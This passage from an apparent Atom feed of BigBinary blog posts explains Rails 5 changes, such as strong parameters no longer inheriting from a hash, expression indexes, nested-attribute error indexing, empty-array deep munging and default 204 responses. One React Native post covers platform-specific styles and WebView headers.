      <updated>2016-07-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/parameters-no-longer-inherit-from-hash-with-indifferent-access-in-rails-5</id>
      <content type="html"><![CDATA[<p>We are all guilty of treating <code>ActionController::Parameters</code> as a plain hash atsome point or the other. But with Rails 5, <code>ActionController::Parameters</code> willno longer inherit from <code>HashWithIndifferentAccess</code>.</p><p>Inheriting from <code>HashWithIndifferentAccess</code> allowed programmers to callenumerable methods over <code>ActionController::Parameters</code>, which caused<code>ActionController::Parameters</code> to lose its <code>@permitted</code> state there by renderingStrong Parameters as a barebone Hash. This<a href="https://github.com/rails/rails/pull/20868/commits/14a3bd520dd4bbf1247fd3e0071b59c02c115ce0">change</a>would discourage such operations.</p><p>However since this change would have meant a major impact on all of theupgrading applications as they would have crashed with a <code>NoMethodError</code>for allof those undesired methods. Hence this feature would go through a deprecationcycle, showing deprecation warnings for all of those <code>HashWithIndifferentAccess</code>method usages.</p><pre><code class="language-ruby">class Parameters...def method_missing(method_sym, *args, &amp;block)  if @parameters.respond_to?(method_sym)    message = &lt;&lt;-DEPRECATE.squish      Method #{method_sym} is deprecated and will be removed in Rails 5.1,      as `ActionController::Parameters` no longer inherits from      hash. Using this deprecated behavior exposes potential security      problems. If you continue to use this method you may be creating      a security vulnerability in your app that can be exploited. Instead,      consider using one of these documented methods which are not      deprecated: http://api.rubyonrails.org/v#{ActionPack.version}/classes/ActionController/Parameters.html    DEPRECATE    ActiveSupport::Deprecation.warn(message)    @parameters.public_send(method_sym, *args, &amp;block)  else    super  endend...end</code></pre><p>If you need to convert <code>ActionController::Parameters</code> in a true hash then itsupports <code>to_h</code> method. Also <code>ActionController::Parameters</code> will continue tohave methods like <code>fetch, slice, slice!, except, except!, extract!, delete</code> etc.You can take a detailed look at them<a href="https://github.com/rails/rails/blob/1a2f1c48bdeda5df88e8031fe51943527ebc381e/actionpack/lib/action_controller/metal/strong_parameters.rb">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 solves ambiguous column issue]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-fixes-ambiguous-cloumn-name-for-projected-fields-in-group-by-query"/>
      <updated>2016-07-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-fixes-ambiguous-cloumn-name-for-projected-fields-in-group-by-query</id>
      <content type="html"><![CDATA[<pre><code class="language-ruby">users(:id, :name)posts(:id, :title, :user_id)comments(:id, :description, :user_id, :post_id)&gt;&gt; Post.joins(:comments).group(:user_id).countMysql2::Error: Column 'user_id' in field list is ambiguous: SELECT COUNT(*) AS count_all, user_id AS user_id FROM `posts` INNER JOIN `comments` ON `comments`.`post_id` = `posts`.`id` GROUP BY user_id</code></pre><p>As we can see <code>user_id</code> has conflict in both <code>projection</code> and <code>GROUP BY</code> as theyare not prepended with the table name <code>posts</code> in the generated SQL and thus,raising SQL error <code>Column 'user_id' in field list is ambiguous</code>.</p><h2>Fix in Rails 5</h2><p>This issue has been addressed in Rails 5 with<a href="https://github.com/rails/rails/pull/21950">this pull request</a>.</p><p>With this fix, we can now <code>group by</code> columns having same name in both thetables.</p><pre><code class="language-ruby">users(:id, :name)posts(:id, :title, :user_id)comments(:id, :description, :user_id, :post_id)&gt;&gt; Post.joins(:comments).group(:user_id).countSELECT COUNT(*) AS count_all, &quot;posts&quot;.&quot;user_id&quot; AS posts_user_id FROM &quot;posts&quot; INNER JOIN &quot;comments&quot; ON &quot;comments&quot;.&quot;post_id&quot; = &quot;posts&quot;.&quot;id&quot; GROUP BY &quot;posts&quot;.&quot;user_id&quot;=&gt; { 1 =&gt; 1 }</code></pre><p>This shows that now both <code>projection</code> and <code>Group By</code> are prepended with the<code>posts</code> table name and hence fixing the conflict.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Expression Indexes & Operator Classes support]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-support-for-expression-indexes-for-postgresql"/>
      <updated>2016-07-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-support-for-expression-indexes-for-postgresql</id>
      <content type="html"><![CDATA[<p>Let's assume that in our health care application we have a page which shows allPatients. This page also has a filter and it allows us to filter patients bytheir name.</p><p>We could implement the filter as shown here.</p><pre><code class="language-ruby">Patient.where(&quot;lower(first_name) = ?&quot;, first_name.downcase)</code></pre><p>There might be many users with the same name. In such cases, to speed up thesearch process, we can add an index. But, adding a regular index will nottrigger an index scan since we are using an expression in the where clause i.e<code>lower(name)</code>. In such cases, we can leverage<a href="https://www.postgresql.org/docs/8.1/static/indexes-expressional.html">expression indexes given by PostgreSQL</a>.</p><p>Before Rails 5 adding an expression index is not straightforward since themigrate api does not support it. In order to add one we would need to ditch<code>schema.rb</code> and start using <code>structure.sql</code>. We would also need to add followingmigration.</p><pre><code class="language-ruby">def upexecute &lt;&lt;-SQLCREATE INDEX patient_lower_name_idx ON patients (lower(name));SQLenddef downexecute &lt;&lt;-SQLDROP INDEX patient_lower_name_idx;SQLend</code></pre><h2>Rails 5 adds support for expression indexes</h2><p>Rails 5 provides<a href="https://github.com/rails/rails/commit/edc2b7718725016e988089b5fb6d6fb9d6e16882">ability to add an expression index using add_index method</a>as follows:</p><pre><code class="language-ruby">def changeadd_index :patients,'lower(last_name)',name: &quot;index_patients_on_name_unique&quot;,unique: trueend</code></pre><p>And we also get to keep schema.rb.</p><p>Time goes on. everyone is happy with the search functionality until one day anew requirement comes along which is, in short, to have partial matches onpatient names.</p><p>We modify our search as follows:</p><pre><code class="language-ruby">User.where(&quot;lower(name) like ?&quot;, &quot;%#{name.downcase}%&quot;)</code></pre><p>Since the query is different from before, PostgreSQL query planner will not takethe already existing btree index into account and will revert to a sequentialscan.</p><p>Quoting directly from Postgresql documents,</p><pre><code class="language-plaintext">'The operator classes text_pattern_ops, varchar_pattern_ops, and bpchar_pattern_ops support B-tree indexes on the types text, varchar, and char respectively. The difference from the default operator classes is that the values are compared strictly character by character rather than according to the locale-specific collation rules. This makes these operator classes suitable for use by queries involving pattern matching expressions (LIKE or POSIX regular expressions) when the database does not use the standard &quot;C&quot; locale.'</code></pre><p>We need to add an operator class to the previous index for the query planner toutilize the index that we created earlier.</p><h2>Rails 5 adds support for specifying operator classes on expression indexes</h2><p>In order to add an index with an operator class we could write our migration asshown below.</p><pre><code class="language-ruby">def changeremove_index :patients, name: :index_patients_on_name_uniqueadd_index :patients, 'lower(last_name) varchar_pattern_ops',name: &quot;index_patients_on_name_unique&quot;,unique: trueend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Attach arbitrary metadata to an Active Job in Rails 5]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/attach-arbitrary-metadata-to-an-active-job-in-rails-5"/>
      <updated>2016-07-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/attach-arbitrary-metadata-to-an-active-job-in-rails-5</id>
      <content type="html"><![CDATA[<p>Rails 4.2 came with built-in support for executing jobs in the background usingActive Job. Along with many enhancements to Active Job, Rails 5 provides theability to<a href="https://github.com/rails/rails/pull/18260">attach arbitrary metadata to any job</a>.</p><p>Consider the scenario where we would like to get notified when a job has failedfor more than three times. With the new enhancement, we can make it work byoverriding <code>serialize</code> and <code>deserialize</code> methods of the job class.</p><pre><code class="language-ruby">class DeliverWebhookJob &lt; ActiveJob::Base  def serialize    super.merge('attempt_number' =&gt; (@attempt_number || 0) + 1)  end  def deserialize(job_data)    super(job_data)    @attempt_number = job_data['attempt_number']  end  rescue_from(TimeoutError) do |ex|    notify_job_tried_x_times(@attempt_number) if @attempt_number == 3    retry_job(wait: 10)  endend</code></pre><p>Earlier, deserialization was performed by #deserialize class method andtherefore was inaccessible from the job instance. With the new changes,deserialization is delegated to the deserialize method on job instance therebyallowing it to attach arbitrary metadata when it gets serialized and read itback when it gets performed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Partial template name without Ruby identifier Rails 5]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-partial-template-name-need-not-be-a-valid-ruby-identifier"/>
      <updated>2016-07-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-partial-template-name-need-not-be-a-valid-ruby-identifier</id>
      <content type="html"><![CDATA[<p>Before Rails 5, partials name should start with underscore and should befollowed by any combination of letters, numbers and underscores.</p><p>This rule was required because before<a href="https://github.com/rails/rails/commit/c67005f221f102fe2caca231027d9b11cf630484">commit</a>,rendering a partial without giving <code>:object</code> or <code>:collection</code> used to generate alocal variable with the partial name by default and a variable name in rubycan't have dash and other things like that.</p><p>In the following case we have a file named <code>_order-details.html.erb</code>. Now let'stry to use this partial.</p><pre><code class="language-ruby">&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;body&gt;  &lt;%= render :partial =&gt; 'order-details' %&gt;&lt;/body&gt;&lt;/html&gt;</code></pre><p>We will get following error, if we try to render above view in Rails 4.x.</p><pre><code class="language-ruby">ActionView::Template::Error (The partial name (order-details) is not a valid Ruby identifier;make sure your partial name starts with underscore,and is followed by any combination of letters, numbers and underscores.):2: &lt;html&gt;3: &lt;body&gt;4: Following code is rendered through partial named \_order-details.erb5: &lt;%= render :partial =&gt; 'order-details' %&gt;6: &lt;/body&gt;7: &lt;/html&gt;</code></pre><p>In the above the code failed because the partial name has a dash which is not avalid ruby variable name.</p><p>In Rails 5, we can give our<a href="https://github.com/rails/rails/commit/da9038e">partials any name which starts with underscore</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Passing current record for custom error]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-passing-record-to-error-message-generator"/>
      <updated>2016-07-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-passing-record-to-error-message-generator</id>
      <content type="html"><![CDATA[<p><a href="http://guides.rubyonrails.org/active_record_validations.html">Active Record</a>validations by default provides an error messages, based on applied attributes.But some time we need to display a custom error message while validating arecord.</p><p>We can give custom error message by passing <code>String</code> or <code>Proc</code> to <code>:message</code>.</p><pre><code class="language-ruby">class Book &lt; ActiveRecord::Base  # error message with a string  validates_presence_of :title, message: 'You must provide the title of book.'  # error message with a proc  validates_presence_of :price,      :message =&gt; Proc.new { |error, attributes|      &quot;#{attributes[:key]} cannot be blank.&quot;      }end</code></pre><h2>What's new in Rails 5 ?</h2><p>Rails 5<a href="https://github.com/rails/rails/pull/24119">allows passing record to error message generator.</a>Now we can pass current record object in a proc as an argument, so that we canwrite custom error message based on current object.</p><p>Revised example with current record object.</p><pre><code class="language-ruby">class Book &lt; ActiveRecord::Base  # error message with simple string  validates_presence_of :title, message: 'You must provide the title of book.'  # error message with proc using current record object  validates_presence_of :price,      :message =&gt; Proc.new { |book, data|      &quot;You must provide #{data[:attribute]} for #{book.title}&quot;      }end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Platform specific styles in stylesheet, React Native]]></title>
       <author><name>Bilal Budhani</name></author>
      <link href="https://www.bigbinary.com/blog/apply-platform-specific-styles-in-stylesheet-react-native"/>
      <updated>2016-07-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/apply-platform-specific-styles-in-stylesheet-react-native</id>
      <content type="html"><![CDATA[<p>While writing cross platform applicationswe need to add platform specific styles.There are many ways of accomplishing this.</p><p>React Native<a href="https://github.com/facebook/react-native/pull/7033">introduced</a><code>Platform.select</code> helper in<a href="https://github.com/facebook/react-native/releases/tag/v0.28.0">version 0.28</a>which allows us to write platform specific styles in a concise way.In this blog we will see how to use this newly introduced feature.</p><h3>StyleSheet</h3><p>A basic stylesheet file might look something like this.</p><pre><code class="language-javascript">import { StyleSheet } from &quot;react-native&quot;;export default StyleSheet.create({  container: {    flex: 1,  },  containerIOS: {    padding: 4,    margin: 2,  },  containerAndroid: {    padding: 6,  },});</code></pre><p>Now let's see how we can re-write this StyleSheet using <code>Platform.select</code>.</p><pre><code class="language-javascript">import { StyleSheet, Platform } from &quot;react-native&quot;;export default StyleSheet.create({  container: {    flex: 1,    ...Platform.select({      ios: {        padding: 4,        margin: 2,      },      android: {        padding: 6,      },    }),  },});</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[User agent or custom header in React Native WebView]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/passing-user-agent-or-custom-header-in-react-native-webview"/>
      <updated>2016-07-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/passing-user-agent-or-custom-header-in-react-native-webview</id>
      <content type="html"><![CDATA[<p>Using <a href="https://facebook.github.io/react-native/docs/webview.html">WebView</a> in aReact Native application allows us to reuse already built web pages.</p><p>We have seen that in most of the &quot;web view&quot; based applications the links inheader are mostly turned in native navigational components. It means servershould not be sending header if React Native component is asking for web pages.However those headers should be present if the request is not coming from theReact Native app.</p><h2>Passing custom request headers</h2><p>We can configure React Native app to pass custom request headers when request ismade to the server to fetch pages.</p><pre><code class="language-javascript">let customHeaders = {  &quot;X-DemoApp-Version&quot;: &quot;1.1&quot;,  &quot;X-DemoApp-Type&quot;: &quot;demo-app-react-native&quot;,};</code></pre><p>While invoking WebView component we can pass <code>customHeaders</code> as shown below.</p><pre><code class="language-javascript">renderWebView() {  return (    &lt;WebView      source={ {uri: this.props.url, headers: customHeaders} }    /&gt;  )}</code></pre><h2>Passing user agent</h2><p>React Native also allows us to pass &quot;userAgent&quot; as a prop. However it is onlysupported by android version of React Native.</p><pre><code class="language-javascript">renderWebView() {  return (    &lt;WebView      source={ {uri: this.props.url} }      userAgent=&quot;demo-react-native-app&quot;    /&gt;  )}</code></pre><p>For iOS, we would need to add the following lines to our AppDelegate.m to setthe userAgent.</p><pre><code class="language-objectivec">NSString *newAgent = @&quot;demo-react-native-app&quot;;NSDictionary *dictionary = [[NSDictionary alloc] initWithObjectsAndKeys:newAgent, @&quot;UserAgent&quot;, nil];[[NSUserDefaults standardUserDefaults] registerDefaults:dictionary];</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Skip mailers while generating Rails 5 app]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/skip-mailers-while-generating-rails-5-app"/>
      <updated>2016-07-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/skip-mailers-while-generating-rails-5-app</id>
      <content type="html"><![CDATA[<p>We can now<a href="https://github.com/rails/rails/pull/18288">skip requiring Action Mailer</a> whilegenerating Rails 5 app.</p><pre><code class="language-bash">$ rails new my_app --skip-action-mailer# OR$ rails new my_app -M</code></pre><p>This comments out requiring <code>action_mailer/railtie</code> in <code>application.rb</code>.</p><p>It also omits mailer specific configurations such as<code>config.action_mailer.raise_delivery_errors</code> and<code>config.action_mailer.perform_caching</code> in <code>production/development</code> and<code>config.action_mailer.delivery_method</code> by default in <code>test</code> environment.</p><pre><code class="language-ruby"># application.rbrequire &quot;rails&quot;require &quot;active_model/railtie&quot;require &quot;active_job/railtie&quot;require &quot;active_record/railtie&quot;require &quot;action_controller/railtie&quot;# require &quot;action_mailer/railtie&quot;require &quot;action_view/railtie&quot;require &quot;action_cable/engine&quot;require &quot;sprockets/railtie&quot;require &quot;rails/test_unit/railtie&quot;</code></pre><p>As, we can see <code>action_mailer/railtie</code> is commented out.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Errors can be indexed with nested attributes in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/errors-can-be-indexed-with-nested-attrbutes-in-rails-5"/>
      <updated>2016-07-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/errors-can-be-indexed-with-nested-attrbutes-in-rails-5</id>
      <content type="html"><![CDATA[<p>We use <code>accepts_nested_attributes_for</code> when we want a single form to cater tomultiple models. By using this we can easily provide attributes for associatedmodels.</p><p>In Rails 4.x, if a validation fails for one or more of the associated models,then it is not possible to figure out from error message, which of theassociated model object is the error related to.</p><pre><code class="language-ruby">class Product &lt; ApplicationRecordhas_many :variantsaccepts_nested_attributes_for :variantsendclass Variant &lt; ApplicationRecordvalidates :display_name, :price, presence: trueend&gt; &gt; product = Product.new(name: 'Table')&gt; &gt; variant1 = Variant.new(price: 10)&gt; &gt; variant2 = Variant.new(display_name: 'Brown')&gt; &gt; product.variants = [variant1, variant2]&gt; &gt; product.save&gt; &gt; =&gt; false&gt; &gt; product.error.messages&gt; &gt; =&gt; {:&quot;variants.display_name&quot;=&gt;[&quot;can't be blank&quot;], :&quot;variants.price&quot;=&gt;[&quot;can't be blank&quot;]}</code></pre><p>In the example above we can see that if this error message is sent as JSON API,we cannot find out which variant save failed because of which attribute.</p><p>This works well when we render forms using Active Record models, as errors areavailable on individual instances. But, the issue arises with an API call, wherewe don't have access to these instances.</p><h2>Rails 5 allows indexing of errors on nested attributes</h2><p>In Rails 5, we can <a href="https://github.com/rails/rails/pull/19686">add an index</a> toerrors on nested models.</p><p>We can add the option <code>index_errors: true</code> to <code>has_many</code> association to enablethis behavior on individual association.</p><pre><code class="language-ruby">class Product &lt; ApplicationRecordhas_many :variants, index_errors: trueaccepts_nested_attributes_for :variantsendclass Variant &lt; ApplicationRecordvalidates :display_name, :price, presence: trueend&gt; &gt; product = Product.new(name: 'Table')&gt; &gt; variant1 = Variant.new(price: 10)&gt; &gt; variant2 = Variant.new(display_name: 'Brown')&gt; &gt; product.variants = [variant1, variant2]&gt; &gt; product.save&gt; &gt; =&gt; false&gt; &gt; product.error.messages&gt; &gt; =&gt; {:&quot;variants[0].display_name&quot;=&gt;[&quot;can't be blank&quot;], :&quot;variants[1].price&quot;=&gt;[&quot;can't be blank&quot;]}</code></pre><h2>Using global configuration</h2><p>In order to make this change global, we can set configuration<code>config.active_record.index_nested_attribute_errors = true</code> which is <code>false</code> bydefault.</p><pre><code class="language-ruby">config.active_record.index_nested_attribute_errors = trueclass Product &lt; ApplicationRecordhas_many :variantsaccepts_nested_attributes_for :variantsendclass Variant &lt; ApplicationRecordvalidates :display_name, :price, presence: trueend</code></pre><p>This will work exactly same as an example with<code>has_many :variants, index_errors: true</code> in <code>Product</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Conversion when deep munging params]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-does-not-convert-blank-array-to-nil-in-deep-munging"/>
      <updated>2016-07-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-does-not-convert-blank-array-to-nil-in-deep-munging</id>
      <content type="html"><![CDATA[<p>In older Rails version (&lt; 3.2), when an empty array was passed to a <code>where</code>clause or to a <code>find_by</code> query, it generated SQL with an <code>IS NULL</code> clause.</p><pre><code class="language-ruby">User.find_by_email([]).to_sql#=&gt; &quot;SELECT * FROM users WHERE email IS NULL&quot;User.find_by_email([nil]).to_sql#=&gt; &quot;SELECT * FROM users WHERE email IS NULL&quot;</code></pre><p>Also, when JSON data of the request was parsed and <code>params</code> got generated thedeep munging converted empty arrays to <code>nil</code>.</p><p>For example, When the following JSON data is posted to a Rails controller</p><pre><code class="language-javascript">{&quot;property_grouping&quot;:{&quot;project_id&quot;:289,&quot;name&quot;:&quot;test group2&quot;,&quot;property_ids&quot;:[]}}</code></pre><p>It gets converted into the following params in the controller.</p><pre><code class="language-javascript">{&quot;property_grouping&quot;=&gt;{&quot;project_id&quot;=&gt;289, &quot;name&quot;=&gt;&quot;test group2&quot;, &quot;property_ids&quot;=&gt;nil, },&quot;action&quot;=&gt;&quot;...&quot;, &quot;controller&quot;=&gt;&quot;...&quot;, &quot;format&quot;=&gt;&quot;json&quot;}</code></pre><p>This in combination with the fact that Active Record constructs <code>IS NULL</code> querywhen blank array is passed became one of the security threats and<a href="https://github.com/rails/rails/issues/13420">one of the most complained issues in Rails</a>.</p><p>The security threat we had was that it was possible for an attacker to issueunexpected database queries with &quot;IS NULL&quot; where clauses. Though there was nothreat of an insert being carried out, there could be scope for firing queriesthat would check for NULL even if it wasn't intended.</p><p>In later version of Rails(&gt; 3.2), we had a different way of handling blankarrays in Active Record <code>find_by</code> and <code>where</code> clauses.</p><pre><code class="language-ruby">User.find_by_email([]).to_sql#=&gt; &quot;SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE 1=0 LIMIT 1&quot;User.find_by_email([nil]).to_sql#=&gt; &quot;SELECT * FROM users WHERE email IS NULL&quot;</code></pre><p>As you can see a conditional for empty array doesn't trigger <code>IS NULL</code> query,which solved part of the problem.</p><p>We still had conversion of empty array to <code>nil</code> in the deep munging in place andhence there was still a threat of undesired behavior when request containedempty array.</p><p>One way to handle it was to add <code>before_action</code> hooks to the action that couldmodify the value to empty array if it were <code>nil</code>.</p><p>In Rails 5,<a href="https://github.com/rails/rails/pull/16924">empty array does not get converted to nil</a>in deep munging. With this change, the empty array will persist as is fromrequest to the <code>params</code> in the controller.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Specific mime types in controller tests in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/use-as-option-to-encode-request-with-specific-mime-type-in-rails-5"/>
      <updated>2016-07-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/use-as-option-to-encode-request-with-specific-mime-type-in-rails-5</id>
      <content type="html"><![CDATA[<p>Before Rails 5, while sending requests with integration test setup, we needed toadd <code>format</code> option to send request with different <code>Mime type</code>.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionController::TestCase  def test_create    post :create, { product: { name: 'Rails 5 book' } }.to_json,        format: :json,        headers: { 'Content-Type' =&gt; 'application/json' }    assert_equal 'application/json', request.content_type    assert_equal({ id: 1, name: 'Rails 5 book' }, JSON.parse(response.body))  endend</code></pre><p>This format for writing tests with <code>JSON</code> type is lengthy and needs too muchinformation to be passed to request as well.</p><h2>Improvement with Rails 5</h2><p>In Rails 5, we can provide <code>Mime type</code> while sending request by<a href="https://github.com/rails/rails/pull/21671">passing it with as option</a> and allthe other information like <code>headers</code> and format will be passed automatically.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def test_create    post products_url, params: { product: { name: 'Rails 5 book' } }, as: :json    assert_equal 'application/json', request.content_type    assert_equal({ 'id' =&gt; 1, 'name' =&gt; 'Rails 5 book' }, response.parsed_body)  endend</code></pre><p>As we can notice, we don't need to parse JSON anymore.</p><p>With changes in this <a href="https://github.com/rails/rails/pull/23597">PR</a>, we canfetch parsed response without needing to call <code>JSON.parse</code> at all.</p><h2>Custom Mime Type</h2><p>We can also register our own encoders for any registered <code>Mime Type</code>.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def setup    Mime::Type.register 'text/custom', :custom    ActionDispatch::IntegrationTest.register_encoder :custom,      param_encoder: -&gt; params { params.to_custom },      response_parser: -&gt; body { body }  end  def test_index    get products_url, params: { name: 'Rails 5 book' }, as: :custom    assert_response :success    assert_equal 'text/custom', request.content_type  endend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Default response with 204 No Content in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/controller-actions-default-no-content-in-rails-5-if-template-is-missing"/>
      <updated>2016-07-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/controller-actions-default-no-content-in-rails-5-if-template-is-missing</id>
      <content type="html"><![CDATA[<p>Before Rails 5, when we forget to add template for an action, we get<code>ActionView::MissingTemplate</code> exception.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    @users = User.all  endendStarted GET &quot;/users&quot; for ::1 at 2016-06-10 17:10:40 +0530Processing by UsersController#index as HTMLCompleted 500 Internal Server Error in 5msActionView::MissingTemplate (Missing template users/index, application/index with {:locale=&gt;[:en], :formats=&gt;[:html], :variants=&gt;[], :handlers=&gt;[:erb, :builder, :raw, :ruby]}...</code></pre><p>Similarly, if we don't specify response for a POST request, we will also get<code>ActionView::MissingTemplate</code> exception.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def create    @user = User.new(user_params)    @user.save  endend</code></pre><pre><code class="language-plaintext">Started POST &quot;/users&quot;Processing by UsersController#create as HTML  Parameters: {&quot;utf8&quot;=&gt;&quot;&quot;, &quot;user&quot;=&gt;{&quot;name&quot;=&gt;&quot;Max&quot;}, &quot;commit&quot;=&gt;&quot;Create User&quot;}   (0.1ms)  begin transaction  SQL (2.7ms)  INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?, ?)  [[&quot;name&quot;, &quot;Max&quot;], [&quot;created_at&quot;, 2016-06-10 12:29:09 UTC], [&quot;updated_at&quot;, 2016-06-10 12:29:09 UTC]]   (0.5ms)  commit transactionCompleted 500 Internal Server Error in 5msActionView::MissingTemplate (Missing template users/create, application/create with {:locale=&gt;[:en], :formats=&gt;[:html], :variants=&gt;[], :handlers=&gt;[:erb, :builder, :raw, :ruby]}...</code></pre><p>In Rails 5,<a href="https://github.com/rails/rails/pull/19377">if we don't specify response for an action then Rails returns <code>204: No content</code> response by default</a>.This change can cause some serious implications during the development phase ofthe app.</p><p>Let's see what happens with the POST request without specifying the response.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def create    @user = User.new(user_params)    @user.save  endend</code></pre><pre><code class="language-plaintext">Started POST &quot;/users&quot;Processing by UsersController#create as HTML  Parameters: {&quot;utf8&quot;=&gt;&quot;&quot;, &quot;user&quot;=&gt;{&quot;name&quot;=&gt;&quot;Max&quot;}, &quot;commit&quot;=&gt;&quot;Create User&quot;}   (0.1ms)  begin transaction  SQL (2.7ms)  INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?, ?)  [[&quot;name&quot;, &quot;Max&quot;], [&quot;created_at&quot;, 2016-06-10 12:29:09 UTC], [&quot;updated_at&quot;, 2016-06-10 12:29:09 UTC]]   (0.5ms)  commit transactionNo template found for UsersController#create, rendering head :no_contentCompleted 204 No Content in 41ms (ActiveRecord: 3.3ms)</code></pre><p>Rails happily returns with <code>204: No content</code> response in this case.</p><p>This means users get the feel that nothing happened in the browser. BecauseRails returned with no content and browser happily accepted it. But in reality,the user record was created in the database.</p><p>Let's see what happens with the GET request in Rails 5.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    @users = User.all  endend</code></pre><pre><code class="language-plaintext">ActionController::UnknownFormat (UsersController#index is missing a template for this request format and variant.request.formats: [&quot;text/html&quot;]request.variant: []NOTE! For XHR/Ajax or API requests, this action would normally respond with 204 No Content: an empty white screen. Since you're loading it in a web browser, we assume that you expected to actually render a template, not nothing, so we're showing an error to be extra-clear. If you expect 204 No Content, carry on. That's what you'll get from an XHR or API request. Give it a shot.):</code></pre><p>Instead of <code>204: No Content</code>, we get<a href="https://github.com/rails/rails/pull/23827"><code>ActionController::UnknownFormat</code> exception</a>.Rails is being extra smart here and hinting that we are probably missingcorresponding template for this controller action. It is smart enough to show usthis message as we requested this page via browser via a GET request. But if thesame request is made via Ajax or through an API call or a POST request, Railswill return <code>204: No Content</code> response as seen before.</p><p>In general, this change can trip us in the development phase, as we are used toincremental steps like adding a route, then the controller action and then thetemplate or response. Getting 204 response can give a feel of nothing happeningwhere things have actually happened in the background. So don't forget torespond properly from your controller actions.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 ensures compatibility with Rack frameworks]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-ensures-compatibility-between-action-dispatch-session-and-rack-session"/>
      <updated>2016-06-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-ensures-compatibility-between-action-dispatch-session-and-rack-session</id>
      <content type="html"><![CDATA[<p>Before Rails 5,<a href="https://github.com/rails/rails/issues/15843">there were errors in running integration tests</a>when a Rack framework like <code>Sinatra</code>, <code>Grape</code> etc. were mounted within Railswith a motive of using its session.</p><p>Problems were reported at many places including<a href="https://gist.github.com/toolmantim/9597022">github gists</a> and<a href="http://stackoverflow.com/questions/22439361/rspec-testing-api-with-rack-protection">stackoverflow</a>regarding an error which was of the following form.</p><pre><code class="language-plaintext">NoMethodError (undefined method `each' for #&lt;ActionDispatch::Request::Session:0x7fb8dbe7f838 not yet loaded&gt;): rack (1.5.2) lib/rack/session/abstract/id.rb:158:in `stringify_keys'rack (1.5.2) lib/rack/session/abstract/id.rb:95:in `update' rack (1.5.2) lib/rack/session/abstract/id.rb:258:in `prepare_session'rack (1.5.2) lib/rack/session/abstract/id.rb:224:in `context' rack (1.5.2) lib/rack/session/abstract/id.rb:220:in `call'</code></pre><p>As we can see, the error occurs due to absence of method <code>each</code> on an<code>ActionDispatch::Request::Session</code> object.</p><p>In Rails 5, <code>each</code> method<a href="https://github.com/rails/rails/pull/24820">was introduced to ActionDispatch::Request::Session</a>class making it compatible with Rack frameworks mounted in Rails and henceavoiding the above mentioned errors in integration testing.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 supports logging errors with tagged logging]]></title>
       <author><name>Sharang Dashputre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-supports-logging-errors-with-tagged-logging"/>
      <updated>2016-06-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-supports-logging-errors-with-tagged-logging</id>
